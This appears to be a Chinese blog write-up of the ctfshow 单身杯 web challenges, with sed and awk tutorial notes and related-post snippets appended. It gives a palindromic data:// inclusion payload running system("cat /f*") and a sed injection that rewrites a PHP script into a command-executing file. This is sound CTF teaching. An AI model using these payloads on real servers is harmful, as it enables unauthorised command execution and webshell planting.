单身杯web wp

最新推荐文章于 2024-11-25 15:10:12 发布
原创 最新推荐文章于 2024-11-25 15:10:12 发布 · 898 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端 #php #开发语言 #网络安全 #web安全

本文详细解析了两例PHP代码审计案例,涉及文件包含漏洞和命令注入。第一例中,通过payload绕过限制,利用反转字符串实现文件包含。第二例中,深入理解escapeshellcmd()和escapeshellarg()函数,利用sed命令替换和写入文件功能,最终执行系统命令获取flag。同时介绍了awk命令的基础知识及其在命令行中的应用。

web签到题

php代码审计

post传入一个参数file,file的反转字符串与file相同时即可执行文件包含

payload :

?file=data://text/plain,<?php echo system("cat /f*")?>>?)"*f/ tac"(metsys ohce php?<,nialp/txet//:atad

使用?>即可对代码进行截断

easyPHP

php代码审计

POST方式传入cmd和param两个参数,使用escapeshellcmd()和escapeshellarg()俩函数处理并合并为一条cmd命令交由shell_exec()函数执行

其中参数cmd限长三位,参数param不限长

escapeshellcmd()和escapeshellarg()函数我都不熟悉,先查一下:

escapeshellcmd()

escapeshellarg()

简单来说,

escapeshellcmd是对&#;|*?~<>^()[]{}$\, \x0A 和 `\xFF这些字符之前添加一个转义字符'\'。

escapeshellarg的作用是 用空格替换了百分号、感叹号(延迟变量替换)和双引号,并在字符串两边加上双引号。此外,每条连续的反斜线(\)都会被一个额外的反斜线所转义。

参照k师傅wp学习

← sed 基础教程sed 环境安装 →

SED简介

sed,英文全称 stream editor ,是一种非交互式的流编辑器,通过多种转换修改流经它的文本。

sed 可以对文字的增删改替换查( 过滤、取行 ),能同时处理多个文件多行的内容。

sed 与 awk 并称为 Linux/Unix 世界的两大王牌文字处理器。

sed 与 awk 一样,都是行文字处理器

awk 侧重点是分割和重新合成。而 sed 的侧重点是替换

步骤一

我们重点看看需要的内容,k师傅使用sed命令替换了shell_exec函数为system函数,并且将$cmd=escapeshellcmd(substr($cmd,0,3))." ".escapeshellarg($param)." ".__FILE__;这一行给删除了

传入的参数是

cmd=sed&param=/esca/d;s/shell_exec/system;w 1.php

sed是三字命令,自然没有超过sustr的字符串长度限制,接下来对命令参数进行说明:

/esca/d: 斜杠这个符号在sed中用于隔离不同参数(或是命令), /d的作用是delete,即删除,/esca是/d所需要匹配的字符串,即含有esca这个字符串所在的行会被删除。

; :sed中分号是不同命令之间的分隔。

s/shell_exec/system:s是sed中的字符串替换命令

在这里可以学到其具体的使用方式与效果:sed 字符串替换命令 s - sed 基础教程 - 简单教程,简单编程

s/shell_exec/system即是将shell_exec替换为system的命令。

w 1.php :w即write 写入,合起来就是将修改后的文件写入1.php中

因此该payload 的实际效果就是 sed '/esca/d;s/shell_exec/system;ww 1.php'

步骤二

那么我们现在了解了sed是如何替换字符串并写入文件的,我们知道最终将有一个1.php会在网站目录下被生成,因此在网站链接后加上1.php进入

可以了解到我们修改后的成果,接下来使用post cmd传入使用的命令行指令:

cmd = ls / :了解当前目录下的文件

cmd=cat /f* 即可拿到flag

AWK 简介

参考链接:AWK 简介 - Awk 基础教程 - 简单教程,简单编程

AWK 是一个命令行工具,它和其它的 Unix/Linux 命令行工具,比如 curlwget 一样,没有界面。

AWK 是一门语言,对的,一门语言,而且是一个解释性编程语言。使用 Awk 可以完成无数的任务,我们简单的罗列几条

  • 文本处理

  • 生成格式化的文本报告

  • 运行一些简单的算术操作

  • 执行一些常见的字符串操作

AWK 程序有两种运行方式:

  1. 一种就是直接在终端( shell )中使用。

  2. AWK 的另一种使用方式,就是可以和 Shell 脚本,写在一个文本文件里,然后运行这个文本文件。不过这种方式不多见

AWK 最常见的使用方式就是在终端里直接输入 AWK 脚本。

awk [options] file ...

在命令行里直接使用,我们需要讲 AWK 代码使用 单引号 ( '' ) 引起来。

比如

[www.twle.cn]$ awk '{print}' employee.txt

exp

因为awk中可以直接执行指令。

web单身之easyphp
NYG694的博客
08-09 242
在liunx中除了普通的cat还有sed,这里面我们的目标其实是从中选取几行代码绕过给出的函数创建新文件,1.<?php组成这样一个文件,我们就可以通过传参随意浏览执行命令。这里要使用正则表达式的匹配首先在原文件中传参cmd=sed然后\是转义所以\|,这样子1.php就生成了,我们再访问当前地址1.php,然后进行传参cmd=echo "<??>">2.php访问2.php,用cmd=system('ls /')就可以读取了。
ctfshow单身
Landasika的博客
05-25 1752
ctfshow单身 web1. web签到 题目代码如下: <?php # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-03-19 12:10:55 # @Last Modified by: h1xa # @Last Modified time: 2022-03-19 13:27:18 # @email: h1xa@ctfer.com # @link: https://ctfer.com error_reporting(0);
[ctfshow 单身]web writeup&&学习一下sed awk基本用法
weixin_45751765的博客
06-08 1832
想起来之前比赛撞了 单身没打完 刚好来复现一下 data伪协议直接过 ?>截断就行poc 远程包含用?参数包含也可 三字长度命令 参数长度任意保证传入字符串参考 sed教程 流程:sed工作流程 sed不用任何语句时可以直接输出源文件内容 本着需要什么学什么的初心 我们直接看payload来学习 sed支持正则匹配 /esca/匹配到 escape行 d 将其删除 sed语句用;间隔开 s字符串替换 shell_exec -> system g为全局替换标志w 写入 -->可以看作cp的功能版 将
ctfshow web 单身
2301_81040377的博客
06-17 745
但是我不是习惯写shell的题嘛,所以我在构造命令的时候写的单引号,结果是不行,为此我还专门去搜索了二者的不同。对于perl文件中定义的变量,为了在system中能被正确使用,要使用双引号;变量能被shell读到,要使用单引号,否则shell看不到美元符号,因为perl会将它用值替换。要进行反转并且包含文件用data协议。命令是一个Linux命令,可以去学学。不理解很正常我也有点不懂反正多试试。但是不知道注入点在哪里,抓包看看。自己写不好写可以用函数帮你翻转。
单身Webweb签到
Pai_Space
07-15 923
单身Webweb签到
ctfshow单身部分wp
m0_62422842的博客
07-09 1218
php伪协议,sed命令和awk命令的用法与应用。SSTI的绕过
ctfshow单身2024wp
star3119391396的博客
11-25 1733
dsbctf-wp-web部分
rtrium-广告素材代理和Web Studio WP主题
06-14
同样,该主题对于那些从事品牌,样式和标识,开发,编码和技术,视频制作,摄影,出版服务,印刷,编程,App开发,数字业务,项目管理的人员也非常有用,并且对一个单身的商人。 多功能商务WordPress功能 Artrium由...
CG-CTF——WPWEB[一])
hahaha233330的博客
12-03 1508
CG-CTF——WriteUp(一) 工具: ①Winhex:图片隐写工具,可通过搜索“ctf”“CTF”“key”“flag”等关键字得到flag。 ②在线工具HtmlEncode/BASE64转换:注意源代码里奇怪的字符串,可以尝试解码(分清类型)。 ③BurpSuite:抓包工具,这个很好用。 ④Wireshark:抓包工具。使用说明: 1、签到题 直接F12查看源代码就可以得到flag...
Web】CTFSHOW 单身 题解
uuzeray的博客
05-10 1106
再访问./flag.txt拿到flag。用data协议包含php标签闭合。此地无银三百两测出SSTI。访问./source。
Ctfshow [单身]
记录学习,一起进步
05-11 1019
Ctfshow [单身]
ctfshow 单身(dsb)
qq_29634299的博客
05-22 1434
OSINT 任性老板 用yandex识图搜到虎扑的关于这个点的信息 https://bbs.hupu.com/27645621.html 通过恢复知道这个店铺的名字叫左撇子私房面 通过百度搜索店面即可获得电话号码 蛤壳雪茄-1 谷歌识图找到原图 知道它是mary river aerodrome这个 搜索得到 搜索这第一个公司的名字即可得到公司网站得到flag re re签到 拖到 IDA中 f5反汇编,看到 if ( !strcmp(v5, "V2toT2FWZ3pTbXhZTTA1d1dqSTFabU
CTFSHOW-单身WEB部分复现WP
qq_61620566的博客
11-15 5429
CTFSHOW单身赛后复盘
ctfshow 单身Misc easy_mem
Alc0rIl1uminate的博客
11-15 1544
ctfshow单身misc:easy_mem1、2、3
ctfshow | 单身dsb | pwn | ctfshow_OA
Dem1的博客
05-22 581
#create user&password -> login -> validate psn session -> from pwn import * p = remote("pwn.challenge.ctf.show",28156) #-----main -> menu #-----from main #-----create_new_user p.sendline('1') p.recvuntil('username :') p.sendline('pwn')#
【ctfshow单身 TooYoungRSA】
chuxuezhewocao的博客
05-28 433
前言 ctfshow —单身 TooYoungRSA 一、题目分析 nc之后题目给出了个随机数(小于n)加密后的值ck,以及ck经过sha256之后的hex编码(key),后面用到这个key对flag进行AES加密,AES加密部分很好处理,但是关键在于不知道前面RSA加密部分的n和e。根据源码后面我们知道了,我们可以一直输入内容,然后函数返回相同的n和e加密后的值,这里我们可以进行选择明文攻击,得到n和e。 二、公式推导 由题知: k ^ e ≡ c1(mod n) 此时假设我们再输入k^2,得到: (k
2024ctfshow单身wp
ShaoYuuuu的博客
11-23 828
(盲猜一波前七个字母是ctfshow(x)(做对这道题要看懂题目给的程序)
ctfshow单身Crypto部分做题记录
2301_79035389的博客
11-15 1253
打开脚本,只有一个m,long_to_bytes(m),得到n,c的十六进制,在这里发现一个细节,直接使用int(n)就可以把n转为十进制,加不加16都可以接着根据提示,爆破d,得到flag。
强网青少年专项赛web wp
最新发布
03-26
<think>好的,我现在需要帮助用户寻找关于强网青少年专项赛Web部分的解题思路或Writeup。用户明确提到了想要Web部分的解题思路,所以我要集中精力在这部分。 首先,我应该回忆一下自己知道的强网比赛情况。强网是一个网络安全竞赛,通常包括多个方向如Pwn、Reverse、Crypto、Web等。用户提到的引用内容中,引用了两篇Writeup,但里面提到的是Pwn、Reverse、Crypto题目的情况,而Web部分可能没有被详细提及。例如,引用[1]中的用户提到“Pwn 一道题都不会捏qwq Reverse 一道题都不会捏qwq Crypto crypto1”,但Web部分可能没有写出来。引用[2]同样没有提到Web题目的具体内容。 接下来,我需要考虑用户可能的需求。用户可能参加了这个比赛,或者在准备类似的比赛,需要参考往届的解题思路来提高自己的技能。由于公开的Writeup中Web部分的信息有限,可能需要给出一般性的解题建议,或者指导用户如何寻找相关资料。 另外,我需要确保回答符合用户的要求,结构清晰,分步骤解决问题,并且真实可靠。可能需要建议用户查看官方资料、社区论坛、GitHub仓库或者联系参赛队伍获取更多信息。同时,提醒用户注意题目中的常见考点,如SQL注入、文件上传漏洞、反序列化等,这些都是Web题目中常见的类型。 还需要检查是否有遗漏的信息。比如,是否有其他年份的强网比赛Writeup中包含了Web部分的内容?如果用户提到的第六届和第八届的Writeup中没有,可能需要建议用户搜索其他届次或者类似比赛的解题思路。 最后,应该生成相关问题,帮助用户进一步探索。例如,询问常见的Web漏洞类型或CTF中Web题的训练方法,这样可以引导用户深入学习相关知识点。</think>关于强网青少年专项赛Web题目的公开Writeup目前较为有限。根据现有资料显示,第六届和第八届赛事中公开的解题报告主要聚焦在Crypto、Pwn等方向,Web部分的详细解题思路尚未见完整披露[^1][^2]。以下是可提供的建议思路: 1. **常见漏洞定位** Web题常涉及SQL注入、文件上传漏洞、反序列化攻击等考点。建议通过修改HTTP请求头参数(如`X-Forwarded-For`)测试服务端过滤机制,例如: ```python import requests r = requests.post(url, headers={"X-Forwarded-For": "127.0.0.1"}) ``` 2. **框架特性利用** 若题目使用Spring、Flask等框架,需注意模板注入漏洞,测试如`{{7*7}}`等表达式是否被解析 3. **数据流追踪** 使用浏览器开发者工具分析网络请求,重点关注Cookie字段和JWT令牌的加密方式,使用`jwt.io`在线工具解码验证 建议通过以下渠道获取更多信息: - 访问CTF赛事平台(如CTFHub、攻防世界)的Web专项训练 - 查阅GitHub仓库搜索"强网 Web writeup"关键词 - 联系参赛战队获取非公开解题文档
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值